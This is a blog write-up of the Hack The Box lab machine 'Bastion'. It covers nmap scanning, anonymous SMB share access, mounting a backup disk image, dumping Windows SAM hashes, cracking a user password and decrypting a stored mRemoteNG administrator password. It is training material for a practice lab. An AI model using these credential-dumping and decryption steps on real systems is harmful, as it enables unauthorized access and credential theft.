Post

Bastion Write up

Posted Updated
By thehunt1s0n 3 min read

Welcome to my Bastion’s Write-up

Recon

Nmap

$ sudo nmap -sSVC -A -oA nmap/bastion 10.10.10.134


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

Nmap scan report for 10.10.10.134
Host is up (0.069s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
.
.
.
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-13T18:00:17
|_  start_date: 2023-06-13T17:58:56
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-13T20:00:19+02:00
|_clock-skew: mean: -39m57s, deviation: 1h09m14s, median: 0s

All Ports Scan:

$ nmap -p- -Pn -A -T4 10.10.10.134


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

Nmap scan report for 10.10.10.134
Host is up (0.11s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: 0s
| smb2-time: 
|   date: 2023-06-13T18:02:18
|_  start_date: 2023-06-13T17:58:56
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-13T20:02:16+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

SMB

We will start by listing shares using smbclient.

$ smbclient -L 10.10.10.134


image 1

We can see that there is an interesting share named “backups”. Let’s access it.

$ smbclient //10.10.10.134/Backups -U "user"%" "


image 2

Download all files using “mget *”.

image 3

Seems like we have to mount it locally.

Initial Foothold

$ mount -t cifs //10.10.10.134/backups /mnt -o user=user,password=


image 4

Note : to install guestmount use the command: sudo apt install libguestfs-tools</div>

image 5

$ sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/


image 6

# cd /mnt2/Windows/System32/config


image 7

# samdump2 ./SYSTEM ./SAM


image 8

Crack the hash

Let’s crack the hash using : https://crackstation.net/

image 9

L4mpje:Bureaulampje

$ ssh L4mpje@10.10.10.134


image 10

Privilege Escalation

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG


l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir


image 11

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml


image 12

We found the administrator’s hash.

To crack it we need to use mremoteng_decrypt : https://github.com/haseebT/mRemoteNG-Decrypt

$ ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==


image 13

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>ssh administrator@10.10.10.134


image 14

writeup
hackthebox
This post is licensed under CC BY 4.0 by the author.